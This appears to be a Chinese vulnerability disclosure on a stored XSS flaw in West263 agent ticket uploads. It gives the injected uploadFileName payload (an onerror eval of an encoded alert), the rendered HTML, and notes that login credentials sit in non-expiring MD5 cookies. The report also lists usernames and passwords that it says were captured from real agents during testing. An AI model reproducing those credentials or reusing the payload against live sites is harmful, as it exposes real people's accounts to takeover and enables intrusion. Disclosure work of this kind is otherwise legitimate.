百度 西部数码代理.随意打开个。
注册用户 提交问题。
改包 将 uploadFileName参数 改为
xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
在 问题跟踪处理 我们可以发现 我们 提交的 代码被处理为
<a href="xxx.jpg" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))" "="" target="_blank"><img src="xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"" alt="点击看大图" border="0" height="58" width="392"></a>
<img>标签内双引号被过滤 ,但是 <a>没有 onerror改为onclick即可点击触发。
同时 发现, 代理商如果从登入 http://www.west263.com/ 官网登入时。
<img>内的 双引号并没有被过滤! 导致无需交互就可以触发xss!
同时 这套系统直接把 username password仅用md5加密就保存在 cookie中。按照他的检验机制 我们所获得 "cookie" 是不会过期的。。
收到 cookie我就没深入了。。。0.0测试时 所获得的 部分代理商 数据。。
账号 rulezhuji
密码 ielsndd
xingluren
admin888@
xufeng
soowo
cddgg
snyywzm
imatao
bjfic
123456bj
akbkcklxj
liangjun123.com
god
51...win
westshenfu
liguangda
作为一个好少年。发现问题的第一时间 我就报告给乌云鸟。 请通知上述相关广商修改密码。。。.
修复方案:
修复xss。 最后再把 验证用户机制改下吧。。
查看更多关于西部数码储存型xss影响部分代理商 - 网站安全的详细内容...